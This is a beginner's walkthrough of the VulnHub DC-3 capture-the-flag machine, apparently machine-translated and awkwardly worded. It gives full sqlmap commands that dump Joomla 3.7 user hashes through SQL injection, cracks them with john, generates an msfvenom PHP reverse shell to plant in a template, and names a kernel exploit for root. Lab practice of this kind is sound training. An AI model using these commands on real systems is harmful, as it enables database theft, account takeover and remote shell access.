01 environment to build
- Drone environment Download: https: //www.vulnhub.com/entry/dc-3,312/
- Title information is as follows
Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Technical Information
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.
Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
02 Information Collection
To restore the environment to the drone virtualbox
after the start of the first step in the collection of information.
Found drone
View attack machine ip is 192.168.56.1
(when using Host-Only Adapter environmental restoration)
using the nmap
scanning network segment ip address
nmap -sP 192.168.56.1/24
The scan found
192.168.56.18
that target drone ip address.
Port Scan
Use nmap
of the target drones scanning open ports
nmap -Pn -n -sV 192.168.56.18
Finding the target drone open a tcp port 80.
web framework
Visit web pages, suggesting that this is only one flag.
By nmap
scanning that uses the web Joomla!
.
Use dirb scan revealed its back to the login page http://192.168.56.18/administrator/
.
Access README.txt
to get its version number is 3.7
in exploitdb
the search found that there is a version of sql injection vulnerability
03 acquiring accounts
Use sqlmap
query the database on the drone.
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs --batch
Can also be re-verified at this url before the look-up table is not a sql injection vulnerability
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch
I found a joomladb
database. Queries the database table.
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables --batch
The results found in a #__users
table, query fields of the table.
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns --batch
python interactive bit of a problem, can not do you want to use common column existence check?
enter when y
, unable to get the field name.
Try to guess the name of the field, and get the account password ciphertext.
qlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C name,password --dump --batch
Use john
blasting the password. To obtain the plaintext password snoopy
.
04 get shell
Use admin
account login http://192.168.56.18/administrator
. You can edit the template found inside the php file. And these templates can be accessed from outside the
edit Beez3
template index.php
file
to use msfvenom
to generate a rebound shell, and copy it to index.php
the.
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 lport=4444 -f raw >shell.php
Then msfconsole
to listen.
You can also use other webshell .
05 mention the right
After obtaining the rebound shell, the search suid
did not find mention the right to be able to take advantage of the program.
View Linux kernel version, try searching kernel exploit.
Use script can recognize the current kernel vulnerability to exist.
Use 2016-4557 CVE-successful attempt to provide the right to obtain a final flag